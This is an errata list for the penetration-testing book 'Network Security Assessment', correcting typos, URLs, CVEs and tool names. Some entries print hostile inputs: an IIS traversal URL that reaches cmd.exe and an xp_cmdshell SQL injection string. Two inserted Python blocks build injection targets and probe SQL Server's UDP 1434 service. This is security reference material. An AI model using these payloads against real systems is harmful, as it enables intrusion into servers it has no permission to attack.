Network Security Assessment

Errata for Network Security Assessment



The errata list is a list of errors and their corrections that were found after the product was released. If the error was corrected in a later version or reprint, the date of the correction will be displayed in the column titled "Date Corrected".

The following errata were submitted by our customers and approved as valid errors by the author or editor.




Version Location Description Submitted By Date Submitted Date Corrected
Printed
Page 4
Figure 1-1, Penetration Testing

"Wide scope 'no holds barred' approach involving multiple attack vendors..." should read: "...involving multiple attack vectors..."

Anonymous   
Printed
Page 4
Figure 1-1

"Network Security Assessment Automated network scanning and report generation, useful to test networks from opportunistic attack" NOW READS: "Network Security Assessment Effective assessment of Internet- based risks using automated tools and qualification by hand"

Anonymous    Aug 01, 2004
Printed
Page 8
Figure 1-2

The description in the "Brute Force Password Grinding" box: Using multipe vectors... should read: Using multiple vectors...

Anonymous   
Printed
Page 8
Figure 1-2

"Accessible TOP and UDP network services" NOW READS: "Accessible TCP and UDP network services"

Anonymous    Aug 01, 2004
Printed
Page 8
Figure 1-2

The arrow going down from 'Network Enumeration' to 'New domain names and IP addresses' HAS BEEN REVERSED and now points upward.

Anonymous    Aug 01, 2004
Printed
Page 14

http://www.microsoft.com/ntserver/nts/downloads/recommended/netkit/default.asp NOW READS: http://www.microsoft.com/ntserver/nts/downloads/recommended/ntkit/default.asp AND http://www.netxeyes.org/smbcrack.exe NOW READS: http://www.netxeyes.org/SMBCrack.exe

Anonymous    May 01, 2004
Printed
Page 46

"Using half-open SYN flags to probe a target is known as an inverted technique because ... " NOW READS: "Using malformed TCP flags to probe a target is known as an inverted technique because ... "

Anonymous    May 01, 2004
Printed
Page 49

http://www.eaglenet.org/antirez/hping2.html NOW READS: http://www.hping.org

Anonymous    May 01, 2004
Printed
Page 66
first paragraph

"If some ports don't respond, but others respond with RST/ACK, the unresponsive ports are considered unfiltered" NOW READS: "If some ports don't respond, but others respond with RST/ACK, the responsive ports are considered unfiltered"

Anonymous    Aug 01, 2004
Printed
Page 79

Table 5-1 should include the following two entries: ZXFR denial-of-service CVE-2000-0887 8.2-8.2.2 patch level 6 Large TTL negative CVE-2003-0914 8.3-8.3.7 and 8.4-8.4.3 cache poisoning bug

Anonymous   
Printed
Page 87

snmpwalk -c public 192.168.0.1 NOW READS: snmpwalk -c private 192.168.0.1

Anonymous    May 01, 2004
Printed
Page 87
Example 5-14

"snmpwalk -c public 192.168.0.1" NOW READS: "snmpwalk -c private 192.168.0.1"

Anonymous    Aug 01, 2004
Printed
Page 91

http://www.xfocus.net/exploits NOW READS: http://examples.oreilly.com/9780596006112/tools/bf_ldap.tar.gz

Anonymous    May 01, 2004
Printed
Page 111
OpenSSL

"HEAD / HTTP/1.0" NOW APPEARS in bold.

Anonymous    Aug 01, 2004
Printed
Page 121
Unicode revisited

http://www.example.org/scripts/..%255c../winnt/system32/cmd.exe/?/c+dir NOW READS: http://www.example.org/scripts/..%255c../winnt/system32/cmd.exe?/c+dir

Anonymous    Aug 01, 2004
Printed
Page 122
Example 6-14

"ispc 192.168.189.10/scripts/idq.dll" NOW APPEARS in bold.

Anonymous    Aug 01, 2004
Printed
Page 122

The following sentence HAS BEEN ADDED to the end of the first paragraph, so that it NOW READS: " ... The iisoop.dll source code is available for analysis at http://www.w00w00.org/files/iisoop.tgz. The bug reference is CVE-2002-0869 and MS02-062."

Anonymous    Aug 01, 2004
Printed
Page 138
About 1/3 down page, the two URLs

http://www.securityfocus.com/archive/75/295545/2003-09-07/2003-09-13/1 http://www.securityfocus.com/archive/75/337304/2003-09-11/2003-09-17/1 NOW READ: http://www.securityfocus.com/archive/75/295545 http://www.securityfocus.com/archive/75/337304

Anonymous    Aug 01, 2004
Printed
Page 150
xp_cmdshell; the following code

"/price.asp?ProductID=12984';EXEC%20master..xp_cmdshell'ping.exe %20212.123.86.4" HAS BEEN REFORMATTED so that it NOW APPEARS: "/price.asp?ProductID=12984';EXEC%20master..xp_cmdshell'ping.exe%20212.123.86.4"

Anonymous    Aug 01, 2004
Printed
Page 151
within the first code example at the top of the page

'net users' NOW READS 'net%20users'

Anonymous    Aug 01, 2004
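The two URL corrections above (page 121 and pages 150-151) come down to percent-encoding: the IIS traversal on page 121 uses a double-encoded backslash (%255c) that only becomes "\" on a second decode, so a filter that decodes once never sees the traversal, and the xp_cmdshell payload on pages 150-151 must not contain a raw space, because a space ends the request-target in the HTTP request line. The following Python is an added example written for this errata page; it is not code from the book. The paths, product ID and address are the ones the errata quote; the function names are made up here.

```python
"""Added example (not from the book): why the page-121 and page-150
corrections matter.  decodes_to_traversal() reports how many percent-
decode rounds a request target needs before it climbs above the web
root; build_injected_target() percent-encodes a stacked xp_cmdshell
payload so the HTTP request line stays intact."""
import re
from urllib.parse import quote, unquote


def decode_rounds(target: str, max_rounds: int = 4) -> list[str]:
    """Percent-decode repeatedly until the string stops changing and
    return every intermediate form (index 0 is the raw request)."""
    forms = [target]
    for _ in range(max_rounds):
        decoded = unquote(forms[-1])
        if decoded == forms[-1]:
            break
        forms.append(decoded)
    return forms


def climbs_above_root(target: str) -> bool:
    """True if the path part of the target has more '..' segments than
    directories above them, treating '\\' and '/' both as separators
    (the IIS behaviour the page-121 request relies on)."""
    path = target.split("?", 1)[0]
    depth = 0
    for segment in re.split(r"[\\/]", path):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment not in ("", "."):
            depth += 1
    return False


def decodes_to_traversal(target: str):
    """Number of decode rounds after which the target escapes the web
    root, or None if it never does.  A result of 2 means a filter that
    decodes only once would pass the request through."""
    for rounds, form in enumerate(decode_rounds(target)):
        if climbs_above_root(form):
            return rounds
    return None


def build_injected_target(base: str, product_id: str, command: str) -> str:
    """Build a page-150 style request target: closing quote, stacked
    EXEC of xp_cmdshell, then the command.  Quotes and semicolons are
    left raw as the book prints them; spaces become %20 so nothing in
    the request line is mistaken for the HTTP-version field."""
    payload = f"{product_id}';EXEC master..xp_cmdshell'{command}"
    return base + quote(payload, safe="';")


if __name__ == "__main__":
    for t in ("/scripts/..%255c../winnt/system32/cmd.exe?/c+dir",
              "/scripts/..%5c../winnt/system32/cmd.exe?/c+dir",
              "/scripts/app/../index.asp"):
        print(t, "->", decodes_to_traversal(t))
    print(build_injected_target("/price.asp?ProductID=", "12984",
                                "ping.exe 212.123.86.4"))
```

The first request needs two decode rounds before it traverses, which is exactly the gap a single-decode check leaves open; the corrected page-150 target comes out with every space encoded and nothing else touched.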
Printed
Page 162
Table 7-1

"OpenSSH 3.7.1 contains buffer management errors" NOW READS: "OpenSSH 3.7 and prior contains buffer management errors"

Anonymous    Aug 01, 2004
Printed
Page 167
4th line from the bottom

"Running 7350logoout from a Linux platform" NOW READS: "Running 7350logout from a Linux platform".

Anonymous    Aug 01, 2004
Printed
Page 171
2nd paragraph example

"chrismail.trustmatta.com" should be "chris mail.trustmatta.com"

Anonymous   
Printed
Page 172
notes

It is very easy to get from user/bin to user/root under Unix-based systems should be: It is very easy to get from bin privilege to root privilege under Unix-based systems

Anonymous   
Printed
Page 174
1st paragraph

X Consortium was closed in 1996. X is currently maintained by X.org foundation. see http://en.wikipedia.org/wiki/X_Window_System#The_X_Consortium

Anonymous   
Printed
Page 197
Final paragraph

"although this may be difficult to exploit under Solaris." NOW READS: "although this may be difficult to exploit."

Anonymous    Aug 01, 2004
Printed
Page 198
2nd paragraph

heck the MITRE CVE and ... Should be check the MITRE CVE and ...

Anonymous   
Printed
Page 202
Microsoft SQL Server

"The service listens on UDP port 1434 and returns the IP address and port number" should read: "The service listens on UDP port 1434 and returns the server name and port number"

Anonymous   
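The page-202 correction concerns what the SQL Server browse service on UDP port 1434 actually returns: not an IP address but the server name, instance name and the TCP port each instance listens on. The following Python is an added example written for this errata page, not code from the book or from sqlping: a one-byte request (0x02 broadcast, 0x03 unicast) draws a 0x05 response whose body is a semicolon-separated key/value list terminated by ";;". The sample response bytes, host name and version string are constructed for the example; the function names are made up here.

```python
"""Added example (not from the book): the UDP 1434 exchange behind the
page-202 correction.  parse_ssrp_response() turns a server response
into one dict per instance; endpoints() pulls out the (server name,
instance, tcp port) triples the corrected text describes.  probe()
sends the real request and needs network access; the tests only use
the constructed SAMPLE_RESPONSE."""
import socket
import struct

CLNT_BCAST_EX = b"\x02"   # enumerate every instance on the subnet
CLNT_UCAST_EX = b"\x03"   # enumerate every instance on one host
SVR_RESP = 0x05           # first byte of a server response

# Constructed sample response for one default instance (not captured traffic).
SAMPLE_BODY = (
    b"ServerName;SQLBOX;InstanceName;MSSQLSERVER;IsClustered;No;"
    b"Version;8.00.194;tcp;1433;np;\\\\SQLBOX\\pipe\\sql\\query;;"
)
SAMPLE_RESPONSE = bytes([SVR_RESP]) + struct.pack("<H", len(SAMPLE_BODY)) + SAMPLE_BODY


def parse_ssrp_response(datagram: bytes) -> list[dict[str, str]]:
    """Parse a SVR_RESP datagram: 0x05, little-endian 16-bit body
    length, then 'key;value;...;;' records, one per instance.
    Raises ValueError on anything that is not a well-formed response,
    including a body shorter than its declared length."""
    if len(datagram) < 3 or datagram[0] != SVR_RESP:
        raise ValueError("not an SSRP server response")
    (size,) = struct.unpack_from("<H", datagram, 1)
    body = datagram[3:3 + size].decode("latin-1")
    if len(body) != size:
        raise ValueError("truncated SSRP response")
    instances = []
    for record in body.split(";;"):
        if not record:
            continue
        fields = record.split(";")
        if len(fields) % 2:
            raise ValueError("odd number of fields in SSRP record")
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances


def endpoints(instances: list[dict[str, str]]) -> list[tuple[str, str, int]]:
    """(server name, instance name, tcp port) for every instance that
    advertises a TCP listener; this is what reveals a non-default port."""
    return [(i.get("ServerName", ""), i.get("InstanceName", ""), int(i["tcp"]))
            for i in instances if "tcp" in i]


def probe(host: str, timeout: float = 2.0) -> list[dict[str, str]]:
    """Send CLNT_UCAST_EX to host:1434 and parse the reply (needs network)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(CLNT_UCAST_EX, (host, 1434))
        data, _ = sock.recvfrom(65535)
    return parse_ssrp_response(data)


if __name__ == "__main__":
    for name, instance, port in endpoints(parse_ssrp_response(SAMPLE_RESPONSE)):
        print(f"{name}\\{instance} listens on tcp/{port}")
```

The length field is checked before the body is split, so a reply that is cut short, or one that is not a 0x05 response at all, is rejected rather than half-parsed.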
Printed
Page 202

http://www.sqlsecurity.com/uploads/sqlping.zip NOW READS: http://examples.oreilly.com/9780596006112/tools/sqlping.zip

Anonymous    May 01, 2004
Printed
Page 204

http://www.sqlsecurity.com/uploads/forcesql.zip and http://www.sqlsecurity.com/uploads/sqlbf.zip NOW READ: http://examples.oreilly.com/9780596006112/tools/forcesql.zip and http://examples.oreilly.com/9780596006112/tools/sqlbf.zip

Anonymous    May 01, 2004
Printed
Page 207
fig 8-7 and paragraph above

VSNUM should be: VSNNUM (also the index page 370 needs to be corrected too)

Anonymous   
Printed
Page 210
table 8-5, 3rd entry in the "note" column

Oracle 8i and 9iVersion 8.1.7 and 9.0.1 and prior) TNS Listener... should be: Oracle 8i and 9i(Version 8.1.7 and 9.0.1 and prior) TNS Listener...

Anonymous   
Printed
Page 213
Penultimate paragraph

" , which relates to a remote vulnerability in MySQL 3.23.56 ..." NOW READS: " , which relates to a post-authentication vulnerability in MySQL 3.23.56 ..."

Anonymous    Aug 01, 2004
Printed
Page 215
Microsoft Windows Networking Services

The list of ports (including loc-srv, netbios-ns, microsoft-ds, etc.) NOW READS: loc-srv 135/tcp ... netbios-ssn 139/tcp microsoft-ds 445/tcp microsoft-ds 445/udp

Anonymous    Aug 01, 2004
Printed
Page 219
rpcdump and ifids, final line

"ncacn_http (RPC over HTTP on TCP port 80 or 593)" NOW READS: "ncacn_http (RPC over HTTP on TCP port 80, 593, or others)". On pages 222 and 227, and in the index, "Uriel" NOW READS "Urity".

Anonymous    Aug 01, 2004
Printed
Page 223
Gleaning User Details via SAMR and LSARPC Interfaces, first paragraph

" .. if the SAMR or LSARPC interfaces are accessible." NOW READS: " .. if the SAMR RPC interface is accessible."

Anonymous    Aug 01, 2004
Printed
Page 232
penultimate paragraph

"An attack can run SMBRelay or LC4 ..." NOW READS: "An attack can run SMBRelay or LC5 ..."

Anonymous    Aug 01, 2004
Printed
Page 234

http://ntsecurity.nu/toolbox/winfo.exe NOW READS: http://ntsecurity.nu/downloads/winfo

Anonymous    May 01, 2004
Printed
Page 241
second paragraph, below Example 9-19

The four instances of "LC4" HAVE BEEN CHANGED to "LC5".

Anonymous    Aug 01, 2004
Printed
Page 252

Table 10-1 NOW INCLUDES CVE-2002-0906, as follows: CVE-2002-0906 28/06/2002 Sendmail 8.12.4 and prior can be compromised if running in a non-default configuration, by an attacker using an authoritative DNS server to provide a malformed TXT record to the mail server upon connecting.

Anonymous    Aug 01, 2004
Printed
Page 255
Table 10-3

the "ISS XFID ... Notes" table heading should have a dark grey shaded background

Anonymous   
Printed
Page 268

(RDP running on TCP port 259) NOW READS: (RDP running on UDP port 259)

Anonymous    May 01, 2004
Printed
Page 275
1st paragraph

Due to the number of different RPC services, associated prognum values, ... should be: Due to the number of different RPC services, associated program values, ...

Anonymous   
Printed
Page 275

Table 12-1 is missing a bug in yppasswd, and currently reads: 100009 yppasswd Yes No No No CVE-2001-0779 should read: 100009 yppasswd Yes No Yes No CVE-2001-0779 CVE-2002-0357

Anonymous   
Printed
Page 275

Table 12-1 is missing three bugs in ttdbserverd, and currently reads: 100083 ttdbserverd Yes No Yes Yes CVE-2001-0717 should read: 100083 ttdbserverd Yes No Yes Yes CVE-1999-0003 CVE-2001-0717 CVE-2002-0677 CVE-2002-0679

Anonymous   
Printed
Page 307

The 'xoa' text at the top of Figure 13-16 should be 'x0a'

Anonymous   
Printed
Page 312
Figure 13-17

"Pointer to formal string" NOW READS: "Pointer to format string"

Anonymous    Aug 01, 2004
Printed
Page 313
Figure 13-18

"Pointer to formal string" NOW READS: "Pointer to format string"

Anonymous    Aug 01, 2004
Printed
Page 327
Example 14-7

"25/tcp open smtp" NOW READS: "23/tcp open telnet"

Anonymous    Aug 01, 2004
Printed
Page 350

The rsync service (port 873) is also susceptible to CAN-2003-0962, so should read "see CVE-2002-0048 and CAN-2003-0962"

Anonymous   
Printed
Page 351

"2401 cvspserver Unix CVS service, vulnerable to a number of attacks" should read: "2401 cvspserver Unix CVS service, vulnerable to a number of attacks; see CVE-2003-0015"

Anonymous   
Printed
Page 351

The rwhois service on TCP port 4321 is also susceptible to CVE-2001-0838, so should read "see CVE-2001-0838 and CVE-2001-0913"

Anonymous   
Printed
Page 352

The following should be added to Table A-2: 5135 objectserver IRIX ObjectServer service, can be used to add user accounts on IRIX 6.2 and prior; see CVE-2000-0245

Anonymous